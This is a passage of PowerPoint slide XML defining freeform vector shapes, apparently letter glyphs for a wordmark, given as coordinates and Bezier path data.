                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3104014" y="3937151"/>
                  <a:ext cx="123825" cy="123825"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 54959 w 123825"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX1" fmla="*/ 75248 w 123825"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX2" fmla="*/ 130207 w 123825"/>
                    <a:gd name="connsiteY2" fmla="*/ 125730 h 123825"/>
                    <a:gd name="connsiteX3" fmla="*/ 107061 w 123825"/>
                    <a:gd name="connsiteY3" fmla="*/ 125730 h 123825"/>
                    <a:gd name="connsiteX4" fmla="*/ 94393 w 123825"/>
                    <a:gd name="connsiteY4" fmla="*/ 95631 h 123825"/>
                    <a:gd name="connsiteX5" fmla="*/ 35338 w 123825"/>
                    <a:gd name="connsiteY5" fmla="*/ 95631 h 123825"/>
                    <a:gd name="connsiteX6" fmla="*/ 22479 w 123825"/>
                    <a:gd name="connsiteY6" fmla="*/ 125730 h 123825"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 123825"/>
                    <a:gd name="connsiteY7" fmla="*/ 125730 h 123825"/>
                    <a:gd name="connsiteX8" fmla="*/ 54959 w 123825"/>
                    <a:gd name="connsiteY8" fmla="*/ 0 h 123825"/>
                    <a:gd name="connsiteX9" fmla="*/ 86297 w 123825"/>
                    <a:gd name="connsiteY9" fmla="*/ 76105 h 123825"/>
                    <a:gd name="connsiteX10" fmla="*/ 64675 w 123825"/>
                    <a:gd name="connsiteY10" fmla="*/ 26194 h 123825"/>
                    <a:gd name="connsiteX11" fmla="*/ 43244 w 123825"/>
                    <a:gd name="connsiteY11" fmla="*/ 76105 h 123825"/>
                    <a:gd name="connsiteX12" fmla="*/ 86297 w 123825"/>
                    <a:gd name="connsiteY12" fmla="*/ 76105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3825" h="123825">
                      <a:moveTo>
                        <a:pt x="54959" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="75248" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="130207" y="125730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="107061" y="125730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94393" y="95631"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35338" y="95631"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22479" y="125730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="125730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54959" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="86297" y="76105"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="64675" y="26194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43244" y="76105"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="86297" y="76105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89" name="자유형: 도형 347">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C95C1B65-D6C6-9B4E-9D66-C616F70746ED}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3252033" y="3968679"/>
                  <a:ext cx="76200" cy="95250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 33433 w 76200"/>
                    <a:gd name="connsiteY0" fmla="*/ 96107 h 95250"/>
                    <a:gd name="connsiteX1" fmla="*/ 8668 w 76200"/>
                    <a:gd name="connsiteY1" fmla="*/ 86297 h 95250"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 76200"/>
                    <a:gd name="connsiteY2" fmla="*/ 59912 h 95250"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 76200"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX4" fmla="*/ 21717 w 76200"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX5" fmla="*/ 21717 w 76200"/>
                    <a:gd name="connsiteY5" fmla="*/ 53340 h 95250"/>
                    <a:gd name="connsiteX6" fmla="*/ 26956 w 76200"/>
                    <a:gd name="connsiteY6" fmla="*/ 70295 h 95250"/>
                    <a:gd name="connsiteX7" fmla="*/ 41720 w 76200"/>
                    <a:gd name="connsiteY7" fmla="*/ 76295 h 95250"/>
                    <a:gd name="connsiteX8" fmla="*/ 56960 w 76200"/>
                    <a:gd name="connsiteY8" fmla="*/ 70199 h 95250"/>
                    <a:gd name="connsiteX9" fmla="*/ 62770 w 76200"/>
                    <a:gd name="connsiteY9" fmla="*/ 53054 h 95250"/>
                    <a:gd name="connsiteX10" fmla="*/ 62770 w 76200"/>
                    <a:gd name="connsiteY10" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX11" fmla="*/ 84487 w 76200"/>
                    <a:gd name="connsiteY11" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX12" fmla="*/ 84487 w 76200"/>
                    <a:gd name="connsiteY12" fmla="*/ 94107 h 95250"/>
                    <a:gd name="connsiteX13" fmla="*/ 62770 w 76200"/>
                    <a:gd name="connsiteY13" fmla="*/ 94107 h 95250"/>
                    <a:gd name="connsiteX14" fmla="*/ 62770 w 76200"/>
                    <a:gd name="connsiteY14" fmla="*/ 79343 h 95250"/>
                    <a:gd name="connsiteX15" fmla="*/ 51245 w 76200"/>
                    <a:gd name="connsiteY15" fmla="*/ 91154 h 95250"/>
                    <a:gd name="connsiteX16" fmla="*/ 33433 w 76200"/>
                    <a:gd name="connsiteY16" fmla="*/ 96107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6200" h="95250">
                      <a:moveTo>
                        <a:pt x="33433" y="96107"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="22765" y="96107"/>
                        <a:pt x="14478" y="92869"/>
                        <a:pt x="8668" y="86297"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2858" y="79820"/>
                        <a:pt x="0" y="70961"/>
                        <a:pt x="0" y="59912"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21717" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21717" y="53340"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21717" y="60674"/>
                        <a:pt x="23431" y="66389"/>
                        <a:pt x="26956" y="70295"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30480" y="74295"/>
                        <a:pt x="35338" y="76295"/>
                        <a:pt x="41720" y="76295"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48006" y="76295"/>
                        <a:pt x="53054" y="74295"/>
                        <a:pt x="56960" y="70199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60865" y="66103"/>
                        <a:pt x="62770" y="60388"/>
                        <a:pt x="62770" y="53054"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="62770" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84487" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84487" y="94107"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62770" y="94107"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62770" y="79343"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="59722" y="83915"/>
                        <a:pt x="55817" y="87821"/>
                        <a:pt x="51245" y="91154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46577" y="94488"/>
                        <a:pt x="40672" y="96107"/>
                        <a:pt x="33433" y="96107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90" name="자유형: 도형 348">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C9AC0A-445E-2940-8AA6-58382CA85867}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3356141" y="3942866"/>
                  <a:ext cx="57150" cy="114300"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 39243 w 57150"/>
                    <a:gd name="connsiteY0" fmla="*/ 121634 h 114300"/>
                    <a:gd name="connsiteX1" fmla="*/ 28289 w 57150"/>
                    <a:gd name="connsiteY1" fmla="*/ 120205 h 114300"/>
                    <a:gd name="connsiteX2" fmla="*/ 19526 w 57150"/>
                    <a:gd name="connsiteY2" fmla="*/ 115538 h 114300"/>
                    <a:gd name="connsiteX3" fmla="*/ 13906 w 57150"/>
                    <a:gd name="connsiteY3" fmla="*/ 107061 h 114300"/>
                    <a:gd name="connsiteX4" fmla="*/ 11906 w 57150"/>
                    <a:gd name="connsiteY4" fmla="*/ 93917 h 114300"/>
                    <a:gd name="connsiteX5" fmla="*/ 11906 w 57150"/>
                    <a:gd name="connsiteY5" fmla="*/ 44387 h 114300"/>
                    <a:gd name="connsiteX6" fmla="*/ 0 w 57150"/>
                    <a:gd name="connsiteY6" fmla="*/ 44387 h 114300"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 57150"/>
                    <a:gd name="connsiteY7" fmla="*/ 25813 h 114300"/>
                    <a:gd name="connsiteX8" fmla="*/ 11906 w 57150"/>
                    <a:gd name="connsiteY8" fmla="*/ 25813 h 114300"/>
                    <a:gd name="connsiteX9" fmla="*/ 11906 w 57150"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 114300"/>
                    <a:gd name="connsiteX10" fmla="*/ 33623 w 57150"/>
                    <a:gd name="connsiteY10" fmla="*/ 0 h 114300"/>
                    <a:gd name="connsiteX11" fmla="*/ 33623 w 57150"/>
                    <a:gd name="connsiteY11" fmla="*/ 25813 h 114300"/>
                    <a:gd name="connsiteX12" fmla="*/ 58960 w 57150"/>
                    <a:gd name="connsiteY12" fmla="*/ 25813 h 114300"/>
                    <a:gd name="connsiteX13" fmla="*/ 58960 w 57150"/>
                    <a:gd name="connsiteY13" fmla="*/ 44387 h 114300"/>
                    <a:gd name="connsiteX14" fmla="*/ 33623 w 57150"/>
                    <a:gd name="connsiteY14" fmla="*/ 44387 h 114300"/>
                    <a:gd name="connsiteX15" fmla="*/ 33623 w 57150"/>
                    <a:gd name="connsiteY15" fmla="*/ 90583 h 114300"/>
                    <a:gd name="connsiteX16" fmla="*/ 36671 w 57150"/>
                    <a:gd name="connsiteY16" fmla="*/ 99631 h 114300"/>
                    <a:gd name="connsiteX17" fmla="*/ 45244 w 57150"/>
                    <a:gd name="connsiteY17" fmla="*/ 102394 h 114300"/>
                    <a:gd name="connsiteX18" fmla="*/ 58579 w 57150"/>
                    <a:gd name="connsiteY18" fmla="*/ 99155 h 114300"/>
                    <a:gd name="connsiteX19" fmla="*/ 58579 w 57150"/>
                    <a:gd name="connsiteY19" fmla="*/ 116777 h 114300"/>
                    <a:gd name="connsiteX20" fmla="*/ 49816 w 57150"/>
                    <a:gd name="connsiteY20" fmla="*/ 120301 h 114300"/>
                    <a:gd name="connsiteX21" fmla="*/ 39243 w 57150"/>
                    <a:gd name="connsiteY21" fmla="*/ 121634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7150" h="114300">
                      <a:moveTo>
                        <a:pt x="39243" y="121634"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35338" y="121634"/>
                        <a:pt x="31718" y="121158"/>
                        <a:pt x="28289" y="120205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24956" y="119253"/>
                        <a:pt x="22003" y="117729"/>
                        <a:pt x="19526" y="115538"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17050" y="113443"/>
                        <a:pt x="15145" y="110585"/>
                        <a:pt x="13906" y="107061"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12573" y="103537"/>
                        <a:pt x="11906" y="99155"/>
                        <a:pt x="11906" y="93917"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11906" y="44387"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="44387"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="25813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11906" y="25813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11906" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33623" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33623" y="25813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58960" y="25813"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58960" y="44387"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33623" y="44387"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33623" y="90583"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="33623" y="94774"/>
                        <a:pt x="34671" y="97727"/>
                        <a:pt x="36671" y="99631"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38671" y="101441"/>
                        <a:pt x="41529" y="102394"/>
                        <a:pt x="45244" y="102394"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49911" y="102394"/>
                        <a:pt x="54388" y="101346"/>
                        <a:pt x="58579" y="99155"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="58579" y="116777"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="55817" y="118301"/>
                        <a:pt x="52959" y="119539"/>
                        <a:pt x="49816" y="120301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46863" y="121158"/>
                        <a:pt x="43244" y="121634"/>
                        <a:pt x="39243" y="121634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91" name="자유형: 도형 349">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0316DFAE-263A-844C-A2AA-290F53604CDF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3431484" y="3966774"/>
                  <a:ext cx="95250" cy="95250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 50006 w 95250"/>
                    <a:gd name="connsiteY0" fmla="*/ 98203 h 95250"/>
                    <a:gd name="connsiteX1" fmla="*/ 30099 w 95250"/>
                    <a:gd name="connsiteY1" fmla="*/ 94393 h 95250"/>
                    <a:gd name="connsiteX2" fmla="*/ 14192 w 95250"/>
                    <a:gd name="connsiteY2" fmla="*/ 83915 h 95250"/>
                    <a:gd name="connsiteX3" fmla="*/ 3715 w 95250"/>
                    <a:gd name="connsiteY3" fmla="*/ 68390 h 95250"/>
                    <a:gd name="connsiteX4" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY4" fmla="*/ 49530 h 95250"/>
                    <a:gd name="connsiteX5" fmla="*/ 0 w 95250"/>
                    <a:gd name="connsiteY5" fmla="*/ 49149 h 95250"/>
                    <a:gd name="connsiteX6" fmla="*/ 3810 w 95250"/>
                    <a:gd name="connsiteY6" fmla="*/ 30099 h 95250"/>
                    <a:gd name="connsiteX7" fmla="*/ 14288 w 95250"/>
                    <a:gd name="connsiteY7" fmla="*/ 14478 h 95250"/>
                    <a:gd name="connsiteX8" fmla="*/ 30194 w 95250"/>
                    <a:gd name="connsiteY8" fmla="*/ 3905 h 95250"/>
                    <a:gd name="connsiteX9" fmla="*/ 50292 w 95250"/>
                    <a:gd name="connsiteY9" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX10" fmla="*/ 70390 w 95250"/>
                    <a:gd name="connsiteY10" fmla="*/ 3810 h 95250"/>
                    <a:gd name="connsiteX11" fmla="*/ 86296 w 95250"/>
                    <a:gd name="connsiteY11" fmla="*/ 14288 h 95250"/>
                    <a:gd name="connsiteX12" fmla="*/ 96774 w 95250"/>
                    <a:gd name="connsiteY12" fmla="*/ 29813 h 95250"/>
                    <a:gd name="connsiteX13" fmla="*/ 100489 w 95250"/>
                    <a:gd name="connsiteY13" fmla="*/ 48768 h 95250"/>
                    <a:gd name="connsiteX14" fmla="*/ 100489 w 95250"/>
                    <a:gd name="connsiteY14" fmla="*/ 49149 h 95250"/>
                    <a:gd name="connsiteX15" fmla="*/ 96679 w 95250"/>
                    <a:gd name="connsiteY15" fmla="*/ 68008 h 95250"/>
                    <a:gd name="connsiteX16" fmla="*/ 86201 w 95250"/>
                    <a:gd name="connsiteY16" fmla="*/ 83629 h 95250"/>
                    <a:gd name="connsiteX17" fmla="*/ 70199 w 95250"/>
                    <a:gd name="connsiteY17" fmla="*/ 94202 h 95250"/>
                    <a:gd name="connsiteX18" fmla="*/ 50006 w 95250"/>
                    <a:gd name="connsiteY18" fmla="*/ 98203 h 95250"/>
                    <a:gd name="connsiteX19" fmla="*/ 50387 w 95250"/>
                    <a:gd name="connsiteY19" fmla="*/ 79534 h 95250"/>
                    <a:gd name="connsiteX20" fmla="*/ 62198 w 95250"/>
                    <a:gd name="connsiteY20" fmla="*/ 77153 h 95250"/>
                    <a:gd name="connsiteX21" fmla="*/ 71152 w 95250"/>
                    <a:gd name="connsiteY21" fmla="*/ 70676 h 95250"/>
                    <a:gd name="connsiteX22" fmla="*/ 76867 w 95250"/>
                    <a:gd name="connsiteY22" fmla="*/ 61151 h 95250"/>
                    <a:gd name="connsiteX23" fmla="*/ 78867 w 95250"/>
                    <a:gd name="connsiteY23" fmla="*/ 49625 h 95250"/>
                    <a:gd name="connsiteX24" fmla="*/ 78867 w 95250"/>
                    <a:gd name="connsiteY24" fmla="*/ 49244 h 95250"/>
                    <a:gd name="connsiteX25" fmla="*/ 76771 w 95250"/>
                    <a:gd name="connsiteY25" fmla="*/ 37433 h 95250"/>
                    <a:gd name="connsiteX26" fmla="*/ 70866 w 95250"/>
                    <a:gd name="connsiteY26" fmla="*/ 27813 h 95250"/>
                    <a:gd name="connsiteX27" fmla="*/ 61817 w 95250"/>
                    <a:gd name="connsiteY27" fmla="*/ 21336 h 95250"/>
                    <a:gd name="connsiteX28" fmla="*/ 50197 w 95250"/>
                    <a:gd name="connsiteY28" fmla="*/ 18955 h 95250"/>
                    <a:gd name="connsiteX29" fmla="*/ 38576 w 95250"/>
                    <a:gd name="connsiteY29" fmla="*/ 21336 h 95250"/>
                    <a:gd name="connsiteX30" fmla="*/ 29623 w 95250"/>
                    <a:gd name="connsiteY30" fmla="*/ 27718 h 95250"/>
                    <a:gd name="connsiteX31" fmla="*/ 23908 w 95250"/>
                    <a:gd name="connsiteY31" fmla="*/ 37243 h 95250"/>
                    <a:gd name="connsiteX32" fmla="*/ 22003 w 95250"/>
                    <a:gd name="connsiteY32" fmla="*/ 48863 h 95250"/>
                    <a:gd name="connsiteX33" fmla="*/ 22003 w 95250"/>
                    <a:gd name="connsiteY33" fmla="*/ 49244 h 95250"/>
                    <a:gd name="connsiteX34" fmla="*/ 24098 w 95250"/>
                    <a:gd name="connsiteY34" fmla="*/ 60960 h 95250"/>
                    <a:gd name="connsiteX35" fmla="*/ 30004 w 95250"/>
                    <a:gd name="connsiteY35" fmla="*/ 70580 h 95250"/>
                    <a:gd name="connsiteX36" fmla="*/ 39052 w 95250"/>
                    <a:gd name="connsiteY36" fmla="*/ 77153 h 95250"/>
                    <a:gd name="connsiteX37" fmla="*/ 50387 w 95250"/>
                    <a:gd name="connsiteY37" fmla="*/ 79534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95250" h="95250">
                      <a:moveTo>
                        <a:pt x="50006" y="98203"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="42863" y="98203"/>
                        <a:pt x="36290" y="96965"/>
                        <a:pt x="30099" y="94393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24003" y="91821"/>
                        <a:pt x="18669" y="88392"/>
                        <a:pt x="14192" y="83915"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9715" y="79534"/>
                        <a:pt x="6286" y="74390"/>
                        <a:pt x="3715" y="68390"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1238" y="62484"/>
                        <a:pt x="0" y="56102"/>
                        <a:pt x="0" y="49530"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="49149"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="42386"/>
                        <a:pt x="1238" y="36004"/>
                        <a:pt x="3810" y="30099"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="24194"/>
                        <a:pt x="9906" y="18955"/>
                        <a:pt x="14288" y="14478"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18764" y="10001"/>
                        <a:pt x="24003" y="6477"/>
                        <a:pt x="30194" y="3905"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36290" y="1333"/>
                        <a:pt x="42958" y="0"/>
                        <a:pt x="50292" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57626" y="0"/>
                        <a:pt x="64198" y="1238"/>
                        <a:pt x="70390" y="3810"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76486" y="6382"/>
                        <a:pt x="81820" y="9906"/>
                        <a:pt x="86296" y="14288"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90773" y="18764"/>
                        <a:pt x="94202" y="23908"/>
                        <a:pt x="96774" y="29813"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="99346" y="35719"/>
                        <a:pt x="100489" y="42005"/>
                        <a:pt x="100489" y="48768"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="100489" y="49149"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="100489" y="55816"/>
                        <a:pt x="99250" y="62103"/>
                        <a:pt x="96679" y="68008"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="94107" y="73914"/>
                        <a:pt x="90583" y="79153"/>
                        <a:pt x="86201" y="83629"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="81724" y="88106"/>
                        <a:pt x="76390" y="91630"/>
                        <a:pt x="70199" y="94202"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64008" y="96774"/>
                        <a:pt x="57245" y="98203"/>
                        <a:pt x="50006" y="98203"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="50387" y="79534"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="54769" y="79534"/>
                        <a:pt x="58674" y="78772"/>
                        <a:pt x="62198" y="77153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65722" y="75533"/>
                        <a:pt x="68675" y="73342"/>
                        <a:pt x="71152" y="70676"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73628" y="68008"/>
                        <a:pt x="75533" y="64770"/>
                        <a:pt x="76867" y="61151"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78200" y="57531"/>
                        <a:pt x="78867" y="53721"/>
                        <a:pt x="78867" y="49625"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="78867" y="49244"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="78867" y="45053"/>
                        <a:pt x="78200" y="41148"/>
                        <a:pt x="76771" y="37433"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75343" y="33719"/>
                        <a:pt x="73342" y="30575"/>
                        <a:pt x="70866" y="27813"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68294" y="25051"/>
                        <a:pt x="65342" y="22955"/>
                        <a:pt x="61817" y="21336"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58293" y="19717"/>
                        <a:pt x="54483" y="18955"/>
                        <a:pt x="50197" y="18955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45910" y="18955"/>
                        <a:pt x="42100" y="19717"/>
                        <a:pt x="38576" y="21336"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35052" y="22955"/>
                        <a:pt x="32099" y="25051"/>
                        <a:pt x="29623" y="27718"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27146" y="30385"/>
                        <a:pt x="25241" y="33528"/>
                        <a:pt x="23908" y="37243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22574" y="40957"/>
                        <a:pt x="22003" y="44768"/>
                        <a:pt x="22003" y="48863"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="22003" y="49244"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="22003" y="53435"/>
                        <a:pt x="22669" y="57341"/>
                        <a:pt x="24098" y="60960"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25527" y="64579"/>
                        <a:pt x="27527" y="67818"/>
                        <a:pt x="30004" y="70580"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32575" y="73342"/>
                        <a:pt x="35528" y="75533"/>
                        <a:pt x="39052" y="77153"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42481" y="78677"/>
                        <a:pt x="46292" y="79534"/>
                        <a:pt x="50387" y="79534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92" name="자유형: 도형 350">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73784F1E-0021-F941-B40E-013D7A88DDD6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3553880" y="3966679"/>
                  <a:ext cx="142875" cy="95250"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 142875"/>
                    <a:gd name="connsiteY0" fmla="*/ 2000 h 95250"/>
                    <a:gd name="connsiteX1" fmla="*/ 21717 w 142875"/>
                    <a:gd name="connsiteY1" fmla="*/ 2000 h 95250"/>
                    <a:gd name="connsiteX2" fmla="*/ 21717 w 142875"/>
                    <a:gd name="connsiteY2" fmla="*/ 16383 h 95250"/>
                    <a:gd name="connsiteX3" fmla="*/ 26670 w 142875"/>
                    <a:gd name="connsiteY3" fmla="*/ 10287 h 95250"/>
                    <a:gd name="connsiteX4" fmla="*/ 32766 w 142875"/>
                    <a:gd name="connsiteY4" fmla="*/ 5048 h 95250"/>
                    <a:gd name="connsiteX5" fmla="*/ 40577 w 142875"/>
                    <a:gd name="connsiteY5" fmla="*/ 1333 h 95250"/>
                    <a:gd name="connsiteX6" fmla="*/ 50292 w 142875"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX7" fmla="*/ 67437 w 142875"/>
                    <a:gd name="connsiteY7" fmla="*/ 4572 h 95250"/>
                    <a:gd name="connsiteX8" fmla="*/ 78200 w 142875"/>
                    <a:gd name="connsiteY8" fmla="*/ 16669 h 95250"/>
                    <a:gd name="connsiteX9" fmla="*/ 91726 w 142875"/>
                    <a:gd name="connsiteY9" fmla="*/ 4572 h 95250"/>
                    <a:gd name="connsiteX10" fmla="*/ 110204 w 142875"/>
                    <a:gd name="connsiteY10" fmla="*/ 0 h 95250"/>
                    <a:gd name="connsiteX11" fmla="*/ 134493 w 142875"/>
                    <a:gd name="connsiteY11" fmla="*/ 9334 h 95250"/>
                    <a:gd name="connsiteX12" fmla="*/ 143256 w 142875"/>
                    <a:gd name="connsiteY12" fmla="*/ 36004 h 95250"/>
                    <a:gd name="connsiteX13" fmla="*/ 143256 w 142875"/>
                    <a:gd name="connsiteY13" fmla="*/ 96107 h 95250"/>
                    <a:gd name="connsiteX14" fmla="*/ 121539 w 142875"/>
                    <a:gd name="connsiteY14" fmla="*/ 96107 h 95250"/>
                    <a:gd name="connsiteX15" fmla="*/ 121539 w 142875"/>
                    <a:gd name="connsiteY15" fmla="*/ 42767 h 95250"/>
                    <a:gd name="connsiteX16" fmla="*/ 116586 w 142875"/>
                    <a:gd name="connsiteY16" fmla="*/ 25717 h 95250"/>
                    <a:gd name="connsiteX17" fmla="*/ 102584 w 142875"/>
                    <a:gd name="connsiteY17" fmla="*/ 19812 h 95250"/>
                    <a:gd name="connsiteX18" fmla="*/ 88106 w 142875"/>
                    <a:gd name="connsiteY18" fmla="*/ 25813 h 95250"/>
